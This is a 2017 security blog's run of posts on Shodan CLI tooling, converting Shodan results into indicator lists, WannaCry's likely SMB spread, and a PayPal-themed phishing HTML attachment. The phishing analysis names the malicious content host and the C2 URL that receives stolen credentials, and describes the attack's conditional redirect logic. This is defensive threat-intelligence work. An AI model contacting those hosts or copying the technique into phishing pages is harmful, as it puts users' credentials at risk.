Tuesday, May 30, 2017

Python: converting Shodan CSV into IOCs CSV

This is a small script that converts the CSV downloaded from Shodan into a new CSV that is usable for ingesting into other platforms (eg. ThreatConnect etc). You can grab the IOCs column (eg. IPs) and create a new csv file with just that column - this new CSV can then be ingested into any other platform. You can pick and chose what column(s) you want to carry over into the new CSV - minor tweaks would be required. I'll keep updating this script and make it as interactive as possible - watch the gitHub repo!
Get it here.


Tuesday, May 23, 2017

Sunday, May 14, 2017

Malware: WannaCry RansomWare - Infection Vector unlikely to be Phishing

By now, the whole world has heard of the new ransomware WannaCry and its variants. Some of you might be wondering why there hasnt been anything posted here on this sire regarding the phishing aspect of the campaign. The reason is quite simple. Unlike what many security vendors have reported, it is highly unlikely that the infection is being spread through phishing campaigns. The malware is targeting victims across the world, based on the well-known SMBv1 vulnerability that was released by ShadowBrokers very recently. It is looking like the internet is being scanned for vulnerable computers and then attacked with the malware.

Easy wins: disable SMB, make sure you are not blocking the killSwitch.

There is a lot of reporting around this now but most of it is just re-tweets and news stories which add little to nothing to the real campaign.

Here's a good RE paper from Jake Williams on the payload.
And here's the tool that you can use to prevent WannaCry infections if you cant patch your systems.


Wednesday, May 10, 2017

Tuesday, May 9, 2017

Phishing: PayPal theme 10 May 2017 | CredSteal

Originally published in PhishCentral

This one is active currently - trying to lure victims into downloading and opening a HTML file, that fires up locally in the browser but POSTs information online, back to the c2 when the 'submit' button is hit, if the information matches the conditions in the script.
This what the email body looks like. 

The HTML Attachment

Clever JS in the background makes the connection. It is obfuscated. 
The actual HTML content only loads if internet is available. The JS fetches the page contents and then displays them in the browser. 

Locally saved html, loaded into a browser with internet avaialble

The actual content is served from this server:  www.infosec1.net

PCAP of the request in the background

The content served

The whole HTML is encrypted and is only decrypted on the go in the browser. When decrypted, we can see the JS code that executes in the browser. 

Decrypted Code

The JS code is clever and checks for a few conditions. If the conditions are met, it POSTs the info to the c2 - http://www.bootstrapcdn3.net/e0445952.php and if the conditions are not met, it re-directs to legit PayPal site. 

One of the conditions. 

Final condition that directs the traffic

IOCs for this:


Using Shodan CLI | Downloading malware IOCs

I started using then Shodan CLI for personal research into malware c2 hosts and found the new shodan tool malwareHunter to be very helpful.
Thought I'd share with you guys how I use the API to grab the IOCs and then convert the JSON report into a CSV, which could then be used in many ways.

All of this is happening AFTER Shodan API keys have been successfully initialised (described in a post earlier).

First up, simply fire up the shodan CLI to download the indicators by running the command below.

$ shodan download --limit [number of results you want eg. 1000] filename [whatever you want to call it. eg. malware-iocs-date category:malware

$ shodan download --limit 1000 malware category:malware

This should dump the results for you in a JSON format file.
Next, if you want to, convert the results into a CSV:

$ shodan convert malware.json.gz csv

That's it. It'll dump a CSV version of the file for you to use whatever way you want to. 


Thursday, May 4, 2017

Installing the Shodan CLI

I've released a python tool that downloads, installs and initiates Shodan CLI - you can get it on github. More details in this post: http://rakshatec.blogspot.com.au/2017/05/free-tool-for-installing-shodan-cli.html

Here's a step-by-step guide for installing the Shodan CLI - very useful if you want to download data using commands instead of the browser. I looked around the internet for something like this but couldn't find anything so thought I'd chuck this one on here.

You need Python installed to get started.
Once you have Python installed and ready to go, follow these steps. Depending on what you have and haven't got installed already, some steps might not be required.

First of all install the  PIP:

$ sudo apt install python-pip

Once PIP is installed, go for Shodan!

$ pip install shodan

Good to go:

Now its time to initialize your API Key - you can get that key from your shodan.io account.
Use this command to initialize the key:

$ shodan init YOUR_API_KEY

You should be good to go from here on.
For more commands, have look here - https://cli.shodan.io/